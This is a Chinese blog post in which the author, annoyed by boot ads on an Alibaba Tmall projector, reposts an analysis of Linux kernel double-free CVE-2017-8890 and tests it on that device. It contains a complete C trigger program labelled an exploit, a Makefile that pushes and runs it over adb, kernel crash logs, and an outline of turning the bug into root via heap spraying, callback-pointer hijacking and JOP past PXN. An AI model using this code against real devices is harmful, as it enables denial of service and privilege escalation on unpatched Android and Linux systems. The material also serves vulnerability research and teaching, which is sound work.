本来对阿里的东西挺有好感的,没想到这么一个东西就一个开机广告问题把我的好感败光了。
入手的时候根本没有什么开机广告,使用三个月之后一次系统更新就出现了开机广告。感情升级就是生个开机广告?果断投诉。
可是又如何呢?最多只是把我提到的“开机广告音量大,吓死人,还不可调节音量”修改了,开机广告还是存在。
就算是入手四五个月还是比较新的,直接拆了,然后扔一边,搬家的时候就当垃圾扔了。
什么阿里!
突然翻到之前的记录,躺着也是躺着,就分享下。
(由于是之前的记录分享,就不在开头说明文中摘抄了,文中有说明原文链接。)
还得感谢大神们的分享,感谢PoC EXP代码作者!取自开源,分享于开源!
在头部补上之前成功的图
-------------------------------------------------------------------------------------------------
一、描述
+ 编号:CVE-2017-8890
+ 类型:double free
+ 位置:kernel/net/ipv4/inet_connection_sock.c
+ 描述:
CVE-2017-8890 的补丁如下所示:
可以看到这个补丁非常简单,只添加了一行代码,作用是将 inet_sk(newsk)->mc_list 置为 NULL。再结合漏洞类型为 double free,很容易得知应该是释放流程中对 mc_list 这个结构体的处理不当,导致了这个漏洞产生。
(以下 漏洞复现 漏洞利用 内容来自)
CVE-2017-8890漏洞分析与利用(Root Android 7.x) - FreeBuf网络安全行业门户 CVE-2017-8890漏洞分析与利用(Root Android 7.x)
漏洞复现:
通过分析漏洞补丁函数inet_csk_clone_lock,整理出该函数的调用链如下图所示:
最终的调用源头为tcp_v4_rcv,该函数用于处理tcp三次握手的数据包,在三次握手完成真正连接建立时,会创建新的 socket对象,因此问题出现在创建新socket的过程,代码如下所示:
struct sock *inet_csk_clone_lock(const struct sock *sk, const struct request_sock *req,
const gfp_t priority)
{
struct sock *newsk = sk_clone_lock(sk, priority);
if (newsk) {
// ...
// cve-2017-8890 patch
// inet_sk(newsk)->mc_list = NULL;
// ...
}
// ...
}
struct sock *sk_clone_lock(const struct sock *sk, const gfp_t priority)
{
newsk = sk_prot_alloc(sk->sk_prot, priority, sk->sk_family);
if (newsk != NULL) {
sock_copy(newsk, sk);
// newsk init...
}
return newsk;
}
static void sock_copy(struct sock *nsk, const struct sock *osk)
{
#ifdef CONFIG_SECURITY_NETWORK
void *sptr = nsk->sk_security;
#endif
memcpy(nsk, osk, offsetof(struct sock, sk_dontcopy_begin));
memcpy(&nsk->sk_dontcopy_end, &osk->sk_dontcopy_end,
osk->sk_prot->obj_size - offsetof(struct sock, sk_dontcopy_end));
#ifdef CONFIG_SECURITY_NETWORK
nsk->sk_security = sptr;
security_sk_clone(osk, nsk);
#endif
}
最后生成的新socket,在该对象初始化之前,先调用了sock_copy函数将父socket数据拷贝过来,生成一个父sock的副本,并且在后边的初始化过程中,没有将mc_list对象初始化,因此造成了父mc_list对象被新的socket对象引用的结果,如果创建多次,也会被引用多次,最后对mc_list对象也会进行多次释放。
下边问题就是如何创建一个带有mc_list对象的socket。查看源码中所有对mc_list的引用,最后的调用来源如下图所示:
ip_mc_join_group函数用于将socket加入到多播组,该函数的调用接口为ip_setsockopt。
该漏洞类型为double free,必然伴随着可多次释放该对象,创建mc_list对象流程有了,再看下该对象的释放流程,如下图所示:
最终可复现该漏洞,伪代码如下所示:
sockfd = socket(AF_INET, SOCK_STREAM|SOCK_CLOEXEC, IPPROTO_IP);
setsockopt(server_sockfd, SOL_IP, MCAST_JOIN_GROUP, &group, sizeof(group);
accept_sockfd1 = accept(sockfd, (struct sockaddr*)&accept1_si, sizeof(accept1_si));
accept_sockfd2 = accept(sockfd, (struct sockaddr*)&accept2_si, sizeof(accept2_si));
// first free
close(accept_sockfd1);
// second free
close(accept_sockfd2);
崩溃信息如下所示:
[35890.702474] ------------[ cut here ]------------
[35890.702509] kernel BUG at /usr/local/google/buildbot/src/partner-android/n-dev-msm-angler-3.10-nyc-mr2/private/msm-huawei/
mm/slub.c:3364
[35890.702518] Internal error: Oops - BUG: 0 [#1] PREEMPT SMP
[35890.702539] CPU: 0 PID: 8 Comm: rcuc/0 Not tainted 3.10.73-g5b0be8f02fe #1
[35890.702548] task: ffffffc00e9a4b40 ti: ffffffc00e9dc000 task.ti: ffffffc00e9dc000
[35890.702576] PC is at kfree+0xe8/0x1e0
[35890.702594] LR is at rcu_do_batch.isra.35+0x118/0x2b4
[35890.702602] pc : [<ffffffc00030240c>] lr : [<ffffffc000299ab8>] pstate: 40000145
[35890.702608] sp : ffffffc00e9dfc90
[35890.702615] x29: ffffffc00e9dfc90 x28: 00000000000005d7
[35890.702630] x27: ffffffc000ce5000 x26: ffffffc03bffd220
[35890.702641] x25: ffffffc03bffd120 x24: ffffffc00e9dc000
[35890.702653] x23: ffffffc00177f618 x22: ffffffc000299ab8
[35890.702665] x21: ffffffc00160fba8 x20: ffffffc03bffd740
[35890.702677] x19: ffffffbc00efff40 x18: 0000000000000000
[35890.702687] x17: 0000000000000000 x16: 0000000000000001
[35890.702699] x15: 0000000000000000 x14: 0ffffffffffffffe
[35890.702711] x13: 0000000000000030 x12: 0101010101010101
[35890.702722] x11: 7f7f7f7f7f7f7f7f x10: feff676273687672
[35890.702734] x9 : 0000000000000040 x8 : ffffffc0c531be00
[35890.702745] x7 : 00000000000003be x6 : 0000000000000004
[35890.702756] x5 : 0000000000000008 x4 : 0000000000000000
[35890.702767] x3 : ffffffc0c1192450 x2 : 0000000000000000
[35890.702778] x1 : 0000000000efff40 x0 : 0000000000000000
[35890.702792]
[35890.702792] PC: 0xffffffc00030230c:
[35890.702798] 2308 14000002b9805001 aa0103e0b9801801 a8c27bfdf9400bf3 a9bb7bfdd65f03c0 a90153f3910003fd d0004f20aa0003f4 a90363f7a9025bf5 aa1e03f6f9420400
[35890.702835] 2348 b9400801a9046bf9 910003e1340002a1 b94052629272c433 b900526211000442 b4000115f9401015 aa1603e1f94002a3 aa1403e2f94006a0 f8410ea0d63f0060
[35890.702869] 2388 b9405260b5ffff40 b900526051000400 36080040f9400260 f100429f94277066 90004f4054000a29 f9419c00d2c00801 8b010001f9400000 8b140021d2dff780
[35890.702901] 23c8 d34cfc21f2ffffe0 8b000033d37ae421 367800e2f8606822 d50339bff9401a62 d34f3c00f8606820 9a9310536b1f001f 37380180f9400260 f272041ff9400260
[35890.702933] 2408 e7f001f254000041 d34e3821f9400261 b9406a6134000041 97ff36aeaa1303e0 910003e014000031 9272c416f9401a78 97fd434352800020 d538d099f9400317
[35890.702965] 2448 f94007558b17033a 97fd437152800020 36080040f94002c0 f9400b4094277036 54000381eb00027f f8776b21b9802300 d53b4224f8206a81 f9400301d50342df
[35890.702998] 2488 d538d08252800003 f8776b25aa0103e0 eb0500dff8606846 9100202154000181 eb15003ff8616841 f820685454000101 d538d080910022b5 52800023f9400301
[35890.703032] 24c8 f821681591002021 350000c3d51b4224 aa1803e017ffffd8 aa1403e2aa1303e1 a94153f397fffadd a94363f7a9425bf5 a8c57bfda9446bf9 a9bc7bfdd65f03c0
[35890.703065] 2508 a9025bf5910003fd a90153f39000b1b6 b94892d5a90363f7 35000155aa0003f3 d2818000f9400401 ea00003ff2a01520 f9402660540000a1 b9404660b5000060
[35890.703100]
[35890.703100] LR: 0xffffffc0002999b8:
[35890.703106] 99b8 9100a034a90573fb eb02029ff9401822 b400136254001380 aa0003f7aa0103f3 d50342dfd53b4236 900052629406f50e 1ac10c0152800801 937d7c21f945a842
[35890.703139] 99f8 f8616841f9400042 370001609ac02420 913836b5d0009eb5 350000e039401aa0 52810161b0007320 97fe1bc8911ac000 39001aa052800020 f9405a60f9401a61
[35890.703171] 9a38 f9400022f90037a0 f9001662f9401660 91012261f900003f f9400023f9401a79 eb02007ff9401a62 f900003454000041 eb14003fd1002021 d51b423654ffff21
[35890.703203] 9a78 910003e1d2800016 9272c438aa1603fc d0009bb59000527b b40003c0912ea2b5 f9800340f940001a f13ffc5ff9400402 cb020000540000a8 9401a21c910006d6
[35890.703236] 9ab8 d63f004014000002 9100079cf94037a0 5400006aeb00039f 17fffff0aa1a03e0 370801a0f9400300 b9433000f9400b00 9406f4cb34ffff40 f8605840f9450362
[35890.703268] 9af8 f9400b00f8756802 54fffe60eb00005f aa0003fa14000002 d50342dfd53b4238 d5033bbfb500023a f9405a61f9403a60 f9403e60cb160016 cb1c0000f9003a76
[35890.703300] 9b38 f9404660f9003e60 92f000008b1c001c f900467ceb00003f 540002a1f9403e61 f94016601400000d f900032091014261 f900167a9100c260 eb02029ff9400002
[35890.703333] 9b78 f800841954fffd21 54ffff61eb01001f 90009c6017ffffe5 f940080091004002 5400006ceb00003f f9005a60f9400440 b50000c1f9404260 f9004261b40000a0
[35890.703366]
[35890.703366] SP: 0xffffffc00e9dfb90:
[35890.703372] fb90 0000000000000000 0000000000000008 0000000000000004 00000000000003be ffffffc0c531be00 0000000000000040 feff676273687672 7f7f7f7f7f7f7f7f
[35890.703403] fbd0 0101010101010101 0000000000000030 0ffffffffffffffe 0000000000000000 0000000000000001 0000000000000000 0000000000000000 ffffffbc00efff40
[35890.703436] fc10 ffffffc03bffd740 ffffffc00160fba8 ffffffc000299ab8 ffffffc00177f618 ffffffc00e9dc000 ffffffc03bffd120 ffffffc03bffd220 ffffffc000ce5000
[35890.703470] fc50 00000000000005d7 ffffffc00e9dfc90 ffffffc000299ab8 ffffffc00e9dfc90 ffffffc00030240c 0000000040000145 ffffffc00e9dfc90 ffffffc000302458
[35890.703503] fc90 ffffffc00e9dfce0 ffffffc000299ab8 ffffffc0c118cbb0 ffffffc0c118cbd8 ffffffc00160fba8 00000000000005ca ffffffc00177f618 ffffffc00e9dc000
[35890.703535] fcd0 ffffffc03bffd120 ffffffc03bffd220 ffffffc00e9dfd50 ffffffc000299e00 ffffffc00160fda0 ffffffc000ce6000 ffffffc0c118cd98 ffffffc00e9dc000
[35890.703567] fd10 00000000bfb7d000 000000000000000a ffffffc001935438 ffffffc000ce6000 0000000000000001 ffffffc000ce6000 ffffffc0c118cd98 7fffffffffffffff
[35890.703599] fd50 ffffffc00e9dfde0 ffffffc00024baf0 ffffffc00e96d2c0 ffffffc00e9dc000 ffffffc0016efee8 0000000000000001 0000000000000001 0000000000000002
[35890.703632]
[35890.703639] Process rcuc/0 (pid: 8, stack limit = 0xffffffc00e9dc058)
[35890.703647] Call trace:
[35890.703658] [<ffffffc00030240c>] kfree+0xe8/0x1e0
[35890.703667] [<ffffffc000299ab4>] rcu_do_batch.isra.35+0x114/0x2b4
[35890.703674] [<ffffffc000299dfc>] rcu_cpu_kthread+0x1a8/0x308
[35890.703688] [<ffffffc00024baec>] smpboot_thread_fn+0x1dc/0x208
[35890.703703] [<ffffffc000243e7c>] kthread+0xc0/0xcc
[35890.703713] Code: 37380180 f9400260 f272041f 54000041 (e7f001f2)
[35890.703724] ---[ end trace bc62c72cba08ddfd ]---
[35890.723573] Kernel panic - not syncing: Fatal exception in interrupt
[35890.723810] CPU1: stopping
该漏洞的原理比较简单,就是在复制对象的时候将指针也一同复制了一份,造成两个指针指向同一对象。因此,漏洞修复也比较简单,直接在复制对象的时候将mc_list指针置为NULL即可。
漏洞利用
劫持EIP
该漏洞的利用思路比较简单直接,在第二次释放之前通过堆喷占位即可。
mc_list对象申请通过slab分配器分配,代码如下:
int ip_mc_join_group(struct sock *sk, struct ip_mreqn *imr)
{
// ...
iml = sock_kmalloc(sk, sizeof(*iml), GFP_KERNEL);
// ...
}
对应汇编代码:
ROM:FFFFFFC000BABD6C loc_FFFFFFC000BABD6C ; CODE XREF: ip_mc_join_group+98j
ROM:FFFFFFC000BABD6C MOV X0, X20
ROM:FFFFFFC000BABD70 MOV W1, #0x30
ROM:FFFFFFC000BABD74 MOV W2, #0xD0
ROM:FFFFFFC000BABD78 BL sock_kmalloc
可知,该对象大小为0×30,位于slab-64,所以堆喷64字节数据即可。
堆喷占位后,我们需要劫持eip,因此需要能够占位到对象中的函数指针,mc_list结构体如下所示:
struct callback_head {
struct callback_head *next;
void (*func)(struct callback_head *head);
};
#define rcu_head callback_head
struct ip_mc_socklist {
struct ip_mc_socklist __rcu *next_rcu;
struct ip_mreqn multi;
unsigned int sfmode;
struct ip_sf_socklist __rcu *sflist;
struct rcu_head rcu;
};
该结构体中存在一个回调函数func,因此将该函数指针覆盖即可劫持eip。该回调函数func的处理流程位于对象释放过程:
void ip_mc_drop_socket(struct sock *sk)
{
// ...
if (!inet->mc_list)
return;
rtnl_lock();
while ((iml = rtnl_dereference(inet->mc_list)) != NULL) {
// ...
kfree_rcu(iml, rcu);
}
rtnl_unlock();
}
该函数获取到mc_list对象后,最后调用kfree_rcu,该函数并不是真正的释放该对象,而是调用call_rcu将要删除的对象保存起来,并标记或者开始一个宽限期,等到cpu宽限期结束,会触发一个RCU软中断,再进行释放,如果有回调函数func,则进行回调函数处理流程,整个函数调用逻辑为:
kfree_rcu -> … -> call_rcu -> … -> invoke_rcu_core -> RCU_SOFTIRQ -> rcu_process_callbacks -> … __rcu_reclaim
最后的释放代码如下所示:
#define __is_kfree_rcu_offset(offset) ((offset) < 4096)
static inline bool __rcu_reclaim(const char *rn, struct rcu_head *head)
{
unsigned long offset = (unsigned long)head->func;
rcu_lock_acquire(&rcu_callback_map);
// 是否存在回调函数
if (__is_kfree_rcu_offset(offset)) {
RCU_TRACE(trace_rcu_invoke_kfree_callback(rn, head, offset));
kfree((void *)head - offset);
rcu_lock_release(&rcu_callback_map);
return true;
} else {
RCU_TRACE(trace_rcu_invoke_callback(rn, head));
head->func(head);
rcu_lock_release(&rcu_callback_map);
return false;
}
}
对应的汇编代码:
如果不存在回调函数,func会被设置成该成员在对象中的偏移,也就是0×20,当func值大于4096即可触发到回调函数流程,即劫持eip。
最终漏洞利用示意图如下所示:
劫持eip的崩溃信息如图所示:
虽然劫持了eip,按照早期的安卓提权思路,直接ret2user即可完成提权操作,然而早已经加入了PXN保护,需要构造JOP来绕过,但是构造JOP需要至少控制一个寄存器,而回调函数执行后的参数为head,即为ip_mc_socklist.rcu地址,该地址为一个内核地址,数据并不可控,从崩溃信息x0寄存器的值也证实了这一点,置此,该漏洞还无法有效利用。
控制寄存器数据
通过对mc_list释放流程的深入研究,最终发现在ip_mc_socklist结构体中,有另外一个很重要的指针变量next_rcu,在内核中,该指针指向下一个ip_mc_socklist对象,并且在ip_mc_drop_socket函数释放流程,会循环遍历该链表,直到next_rcu == NULL,部分代码如下所示:
void ip_mc_drop_socket(struct sock *sk)
{
rtnl_lock();
while ((iml = rtnl_dereference(inet->mc_list)) != NULL) {
inet->mc_list = iml->next_rcu;
kfree_rcu(iml, rcu);
}
rtnl_unlock();
}
因此,我们可以在用户态伪造一个ip_mc_socklist对象fake_iml,然后通过堆喷占位,使第一次被释放的ip_mc_socklist.next_rcu = fake_iml,当内核在处理我们的fake_iml时,最后调用的fun(head)都是我们可控的,且head指向的是用户空间,因此可以达到控制x0寄存器的目的,最终利用示意图如下所示:
控制了eip和x0寄存器,就可以构造JOP进行后续的提权操作,流程比较固定,暂不细讲,最终漏洞利用如下图,测试手机为 Nexus6P 7.12
参考
Multicast technologies on TCP/IP networks
二、触发测试
+ 设备: 天猫魔屏A1, Android 5.1.1,Linux localhost 3.14.29 #1 SMP PREEMPT armv7l GNU/Linux
+ 信息确认: linux-3.14中存在此漏洞(涉及4.10以下版本),但尚不明确 魔屏A1 上是否已修复。
+ 参考1:[原创]CVE-2017-8890 深度分析-二进制漏洞-看雪论坛-安全社区|安全招聘|bbs.pediy.com [原创] CVE-2017-8890 深度分析
+ 参考2:[原创] CVE-2017-8890 漏洞利用(root nexus6p@kernel 3.10)-Android安全-看雪论坛-安全社区|安全招聘|bbs.pediy.com [原创] CVE-2017-8890 漏洞利用(root nexus6p@kernel 3.10)
测试程序:
/*
* CVE-2017-8890
* This is a dobule free vulnerability found by Pray3r using syzkaller from TYA.
*
* -> entry_SYSCALL_64_fastpath() -> SyS_setsockopt() -> SYSC_setsockopt()
* -> sock_common_setsockopt() -> tcp_setsockopt()
* -> ip_setsockopt() -> do_ip_setsockopt() -> do_ip_setsockopt()
* -> ip_mc_join_group() -> sock_kmalloc() -> [...]
*/
/* to use accept4 */
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <pthread.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define TEST_PORT 45555
static int cpu_num;
//static int cpu_id;
static int svr_sockfd;
static struct sockaddr_in svr_addr;
static int svr_ready;
static int cli_sockfd[2];
static int cli_finish;
static void* cli_thread(void *arg)
{
int i = 0, sockfd = -1;
struct sockaddr_in svraddr;
printf("%s: UID=%u, EUID=%u, GID=%u\n", __func__,
getuid(), geteuid(), getgid());
while(!svr_ready)
usleep(1);
memset(&svraddr, 0, sizeof(svraddr));
svraddr.sin_family = AF_INET;
svraddr.sin_port = htons(TEST_PORT);
svraddr.sin_addr.s_addr = inet_addr("127.0.0.1");
for(i=0; i<2; i++) {
sockfd = socket(AF_INET, SOCK_STREAM|SOCK_CLOEXEC, IPPROTO_IP);
if(sockfd < 0) {
printf("create client[%d] socket err: %s\n", i, strerror(errno));
continue;
}
printf("create client[%d] socket ok: fd %d\n", i, sockfd);
if(connect(sockfd, (struct sockaddr*)&svraddr, sizeof(svraddr)) < 0) {
printf("client[%d] connect server err: %s\n", i, strerror(errno));
continue;
}
printf("client[%d] connect server ok\n", i);
close(sockfd);
}
printf("client thread exit\n");
cli_finish = 1;
pthread_exit(0);
}
int main(int argc, char *argv[])
{
struct sockaddr_in addr;
struct group_req req;
pthread_t tid;
int i = 0;
/* print info */
cpu_num = sysconf(_SC_NPROCESSORS_CONF);
setbuf(stdout, NULL);
printf("CVE-2017-8890 exploit. cpu_num : %d\n", cpu_num);
printf("Program %s: UID=%u, EUID=%u, GID=%u\n", argv[0],
getuid(), geteuid(), getgid());
/* ------------------------------------------------------- */
svr_sockfd = socket(AF_INET, SOCK_STREAM | SOCK_CLOEXEC , IPPROTO_IP);
if(svr_sockfd < 0) {
printf("create server socket err: %s\n", strerror(errno));
return 0;
}
printf("create server socket %d ok\n", svr_sockfd);
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(TEST_PORT);
addr.sin_addr.s_addr = inet_addr("224.0.0.0"); // multicast address
req.gr_interface = 1;
memcpy(&req.gr_group, &addr, sizeof(addr));
if(setsockopt(svr_sockfd, SOL_IP, MCAST_JOIN_GROUP, &req, sizeof(req)) < 0) {
printf("set server socket join group err: %s\n", strerror(errno));
goto end;
}
printf("server socket join group ok\n");
memset(&svr_addr, 0, sizeof(svr_addr));
svr_addr.sin_family = AF_INET;
svr_addr.sin_port = htons(TEST_PORT);
svr_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
if(bind(svr_sockfd, (struct sockaddr*)&svr_addr, sizeof(svr_addr)) < 0) {
printf("server socket bind port %u err: %s\n", TEST_PORT, strerror(errno));
goto end;
}
printf("server socket bind port %u ok\n", TEST_PORT);
if(listen(svr_sockfd, 2) < 0) {
printf("server socket listen on port %u err: %s\n", TEST_PORT, strerror(errno));
goto end;
}
printf("server socket listening on port %u\n", TEST_PORT);
if(pthread_create(&tid, NULL, cli_thread, NULL) < 0) {
printf("create client thread err: %s\n", strerror(errno));
goto end;
}
printf("create client thread ok\n");
svr_ready = 1;
for(i=0; i<2; i++) {
cli_sockfd[i] = accept4(svr_sockfd, NULL, NULL, 0);
if(cli_sockfd[i] < 0) {
printf("create client thread err: %s\n", strerror(errno));
goto end;
}
printf("accept client[%d] ok: fd %d\n", i, cli_sockfd[i]);
}
printf("wait client thread finish\n");
while(!cli_finish);
printf("client thread finished\n");
printf("[*] now close client[0] fd %d\n", cli_sockfd[0]);
close(cli_sockfd[0]);
printf("[*] prepare close client[1] fd %d\n", cli_sockfd[1]);
close(cli_sockfd[1]);
printf("something ???\n");
sleep(3);
printf("nothing, to exit\n");
end:
close(svr_sockfd);
return 0;
}
Makefile:
CROSS = $(shell pwd)/../toolchain_arch64
CROSS_COMPILE = $(CROSS)/bin/aarch64-linux-gnu-
CC = $(CROSS_COMPILE)gcc
STRIP = $(CROSS_COMPILE)strip
TARG = exp
OBJS = main.o
CFLAGS = -Wall
LDFLAGS = -static -pthread
all: $(TARG)
$(TARG): $(OBJS)
$(CC) $^ $(LDFLAGS) -o $@
$(STRIP) $@
%.o: %.c
$(CC) -c $^ $(CFLAGS) -o $@
run: $(TARG)
@adb connect 192.168.100.2
@adb push $(TARG) /data/local/tmp/$(TARG) > /dev/null
@adb shell 'chmod 777 /data/local/tmp/$(TARG)' > /dev/null
@echo "----- run $(TARG) -----"
@adb shell /data/local/tmp/$(TARG)
@echo "----- run end -----"
clean:
rm -rf *.o $(TARG)
Make run运行测试:
already connected to 192.168.100.2:5555
----- run exp -----
CVE-2017-8890 exploit. cpu_num : 4
Program /data/local/tmp/exp: UID=2000, EUID=2000, GID=2000
create server socket 3 ok
server socket join group ok
server socket bind port 45555 ok
server socket listening on port 45555
create client thread ok
cli_thread: UID=2000, EUID=2000, GID=2000
create client[0] socket ok: fd 5
accept client[0] ok: fd 4
client[0] connect server ok
create client[1] socket ok: fd 5
accept client[1] ok: fd 6
wait client thread finish
client[1] connect server ok
client thread exit
client thread finished
[*] now close client[0] fd 4
[*] prepare close client[1] fd 6
something ???
nothing, to exit
----- run end -----
魔屏A1 Debug串口信息:
shell@MagicProjector_A1:/ $ [ 76.575284] c0 1 (init) init: process 'dhcpcd_eth0', pid 3977 exited
[ 78.577487] c0 5629 (exp) Unable to handle kernel paging request at virtual address deeba000
[ 78.580489] c0 5629 (exp) pgd = ffffffc01815a000
[ 78.587658] [deeba000] *pgd=0000000000000000
[ 78.589677] c0 5629 (exp) Internal error: Oops: 96000005 [#1] PREEMPT SMP
[ 78.595796] Modules linked in: wlan(O) wlan_prealloc(O) mac80211 cfg80211(O) compat(O) dwc3 mali(O)
[ 78.604767] c0 5629 (exp) CPU: 0 PID: 5629 Comm: exp Tainted: G W O 3.14.29-00002-g9d3299d #1
[ 78.613907] c0 5629 (exp) task: ffffffc0225e1000 ti: ffffffc00c9ec000 task.ti: ffffffc00c9ec000
[ 78.622537] c0 5629 (exp) PC is at ip_mc_drop_socket+0x40/0xb4
[ 78.628310] c0 5629 (exp) LR is at ip_mc_drop_socket+0x94/0xb4
[ 78.634088] c0 5629 (exp) pc : [<ffffffc0017f8da4>] lr : [<ffffffc0017f8df8>] pstate: 80000145
[ 78.642626] c0 5629 (exp) sp : ffffffc00c9efd70
[ 78.647110] x29: ffffffc00c9efd70 x28: ffffffc00c9ec000
[ 78.652371] x27: ffffffc001d37000 x26: 0000000000000039
[ 78.657633] x25: 0000000000000116 x24: ffffffc012a90910
[ 78.662894] x23: ffffffc001dee540 x22: ffffffc023f68700
[ 78.668155] x21: 0000000000000000 x20: ffffffc023f68810
[ 78.673416] x19: 00000000deeba000 x18: 000000000049a000
[ 78.678677] x17: 00000000004a2000 x16: ffffffc0011bb9a0
[ 78.683939] x15: 0000000000001000 x14: 0000000000000001
[ 78.689200] x13: 0000000000000000 x12: 0000000000000000
[ 78.694461] x11: 0101010101010101 x10: 7f7f7f7f7f7f7f7f
[ 78.699722] x9 : fefefefefefefeff x8 : 0000000000000039
[ 78.704984] x7 : 0000000000000000 x6 : 0000000000000000
[ 78.710245] x5 : 0000000000000000 x4 : ffffffc023f68810
[ 78.715506] x3 : 0000000000000001 x2 : 0000000000000000
[ 78.720767] x1 : 0000000000000009 x0 : 0000000000002710
[ 78.726031] c0 5629 (exp)
[ 78.726031] PC: 0xffffffc0017f8d24:
[ 78.732152] 8d24 b9404fa0 a94153f3 a9425bf5 f9401bf7 a8c57bfd d65f03c0 52800004 710004bf
[ 78.740260] 8d44 54fffde1 6b02009f 1a9f27e0 17fffff3 52800000 17fffff1 52800004 17ffffe6
[ 78.748367] 8d64 a9bc7bfd 910003fd a90153f3 a9025bf5 f9001bf7 aa0003f6 aa1e03e0 d503201f
[ 78.756475] 8d84 f9416ec0 b40003e0 97fda50c f9416ed3 d0002fb7 910442d4 911502f7 b4000313
[ 78.764582] 8da4 f9400261 aa1703e0 f9016ec1 b9401261 97ffd8bd aa0003f5 aa0003e2 aa1303e1
[ 78.772690] 8dc4 aa1603e0 97fff9d5 aa1503e0 b4000075 b9400a61 97fff97f 885f7e80 5100c000
[ 78.780797] 8de4 88017e80 35ffffa1 d2800401 8b010260 97e43526 f9416ed3 b5fffd53 97fda4f8
[ 78.788904] 8e04 a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 a9bd7bfd 910003fd a90153f3
[ 78.797014] c0 5629 (exp)
[ 78.797014] LR: 0xffffffc0017f8d78:
[ 78.803136] 8d78 aa0003f6 aa1e03e0 d503201f f9416ec0 b40003e0 97fda50c f9416ed3 d0002fb7
[ 78.811243] 8d98 910442d4 911502f7 b4000313 f9400261 aa1703e0 f9016ec1 b9401261 97ffd8bd
[ 78.819351] 8db8 aa0003f5 aa0003e2 aa1303e1 aa1603e0 97fff9d5 aa1503e0 b4000075 b9400a61
[ 78.827458] 8dd8 97fff97f 885f7e80 5100c000 88017e80 35ffffa1 d2800401 8b010260 97e43526
[ 78.835566] 8df8 f9416ed3 b5fffd53 97fda4f8 a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0
[ 78.843673] 8e18 a9bd7bfd 910003fd a90153f3 aa0003f4 aa1e03e0 b9002ba1 53003c73 b9002fa2
[ 78.851781] 8e38 d503201f f9401284 b9402fa2 b9402ba1 b4000664 52800020 72b3c6e0 1b007c20
[ 78.859888] 8e58 53177c00 f8605884 b5000084 1400001e f9401c84 b4000384 b9400880 6b01001f
[ 78.867997] c0 5629 (exp)
[ 78.867997] SP: 0xffffffc00c9efcf0:
[ 78.874120] fcf0 23f68810 ffffffc0 00000000 00000000 23f68700 ffffffc0 01dee540 ffffffc0
[ 78.882227] fd10 12a90910 ffffffc0 00000116 00000000 00000039 00000000 01d37000 ffffffc0
[ 78.890334] fd30 0c9ec000 ffffffc0 0c9efd70 ffffffc0 017f8df8 ffffffc0 0c9efd70 ffffffc0
[ 78.898442] fd50 017f8da4 ffffffc0 80000145 00000000 00000000 00000000 00000020 00000000
[ 78.906550] fd70 0c9efdb0 ffffffc0 017f2c64 ffffffc0 23f68700 ffffffc0 247a6780 ffffffc0
[ 78.914657] fd90 00000000 00000000 20f59300 ffffffc0 0014a660 ffffffc0 017f2c30 ffffffc0
[ 78.922764] fdb0 0c9efde0 ffffffc0 01738bb8 ffffffc0 247a6780 ffffffc0 00000000 00000000
[ 78.930872] fdd0 247a67b0 ffffffc0 00000039 00000000 0c9efe00 ffffffc0 01738c50 ffffffc0
[ 78.938983] c0 5629 (exp)
[ 78.938983] X4: 0xffffffc023f68790:
[ 78.945103] 8790 23f68788 ffffffc0 00000000 00000000 00000000 00000000 00000000 00000000
[ 78.953211] 87b0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00100000
[ 78.961318] 87d0 00000000 00000000 11a23740 ffffffc0 00000000 00000000 00000000 00000000
[ 78.969426] 87f0 00000300 00000000 00000000 00000000 00000000 00000000 00000000 00000001
[ 78.977533] 8810 3dc9d760 00080000 23f68818 ffffffc0 23f68818 ffffffc0 00000000 00000000
[ 78.985641] 8830 000106c0 00000000 000000d0 ffffffff ffffffff 00000000 00000000 00000000
[ 78.993748] 8850 00000000 00000000 00000000 00000000 00000000 00000001 00000000 00000000
[ 79.001856] 8870 23f68870 ffffffc0 23f68870 ffffffc0 00000000 00000000 01df8088 ffffffc0
[ 79.009968] c0 5629 (exp)
[ 79.009968] X16: 0xffffffc0011bb920:
[ 79.016173] b920 d503201f f9401e60 b4000320 f9401660 f9403002 b4000282 aa1503e1 aa1303e0
[ 79.024281] b940 d63f0040 2a0003f4 b9404660 377000e0 aa1503e1 aa1303e0 94012222 aa1503e1
[ 79.032389] b960 aa1303e0 94014ffb aa1303e0 94000f99 2a1403e0 a94153f3 f94013f5 a8c37bfd
[ 79.040496] b980 d65f03c0 52800014 17fffff0 b0004a80 910fa000 941cb335 52800000 17fffff6
[ 79.048603] b9a0 a9be7bfd 910003fd f9000bf3 aa0003f3 aa1e03e0 d503201f 910003e0 2a1303e1
[ 79.056711] b9c0 9272c402 f9400840 f944dc00 9400816a 11080401 7100043f 54000129 121e7801
[ 79.064818] b9e0 93407c00 3108103f 92800061 9a811000 f9400bf3 a8c27bfd d65f03c0 92800060
[ 79.072926] ba00 f9400bf3 a8c27bfd d65f03c0 a9bd7bfd 910003fd a90153f3 aa0303f3 aa0003f4
[ 79.081036] c0 5629 (exp)
[ 79.081036] X20: 0xffffffc023f68790:
[ 79.087243] 8790 23f68788 ffffffc0 00000000 00000000 00000000 00000000 00000000 00000000
[ 79.095351] 87b0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00100000
[ 79.103459] 87d0 00000000 00000000 11a23740 ffffffc0 00000000 00000000 00000000 00000000
[ 79.111566] 87f0 00000300 00000000 00000000 00000000 00000000 00000000 00000000 00000001
[ 79.119673] 8810 3dc9d760 00080000 23f68818 ffffffc0 23f68818 ffffffc0 00000000 00000000
[ 79.127781] 8830 000106c0 00000000 000000d0 ffffffff ffffffff 00000000 00000000 00000000
[ 79.135888] 8850 00000000 00000000 00000000 00000000 00000000 00000001 00000000 00000000
[ 79.143996] 8870 23f68870 ffffffc0 23f68870 ffffffc0 00000000 00000000 01df8088 ffffffc0
[ 79.152106] c0 5629 (exp)
[ 79.152106] X22: 0xffffffc023f68680:
[ 79.158313] 8680 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 79.166421] 86a0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 79.174528] 86c0 00000000 00000000 23f68700 ffffffc0 00000000 00000000 00000000 00000000
[ 79.182636] 86e0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
